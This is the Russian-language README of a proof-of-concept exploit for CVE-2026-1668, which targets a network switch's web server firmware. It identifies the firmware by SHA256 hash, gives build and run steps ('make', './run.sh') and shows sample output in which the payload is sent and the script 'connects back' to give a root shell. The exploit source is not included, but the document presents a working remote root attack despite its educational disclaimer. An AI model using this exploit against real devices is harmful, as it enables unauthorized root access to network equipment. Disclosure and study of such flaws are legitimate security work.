
Эксплойт Proof-of-concept для CVE-2026-1668.
Это эксплойт доказательства концепции для CVE-2026-1668. Он предназначен исключительно для образовательных целей. Пожалуйста, не пытайтесь эксплуатировать системы, которые вам не принадлежат или для эксплуатации которых у вас нет явного разрешения.
Это доказательство концепции было разработано для образа прошивки со следующим SHA256-хэшем: 4b862b8dd7fde44fa57a39b35b562f21878dd6abb8e92ccd9cdef571ed60d544.
Названия прошивок, соответствующие этому хэшу (неполный список):
Более ранние версии прошивки, вероятно, также уязвимы, но могут потребовать незначительных изменений в полезной нагрузке эксплойта.
Объяснение того, как работает полезная нагрузка, можно найти в этом сообщении в блоге.
Для сборки полезной нагрузки требуется цепочка инструментов MIPS Linux GCC. В Ubuntu 24.04 её можно установить с помощью sudo apt install gcc-mips-linux-gnu.
$ make
Этот эксплойт должен быть запущен до того, как HTTP-сервер обработает свой первый запрос (т.е. при свежей загрузке).
$ ./run.sh
Скрипт должен предоставить вам root-оболочку. Если этого не произошло, эксплойт не сработал.
[*] Sending payload
HTTP/1.1 200 OK
Server: Web Switch
Connection: close
Content-Type: application/json
{"data":{"mByCtrl":0,"includePrivacyPolicy":0,"includeAutoCheck":1,"includeSshController":1},"errorcode":0,"success":true,"timeout":false}
[*] Connecting back to get a shell
/bin/sh: can't access tty; job control turned off
/etc #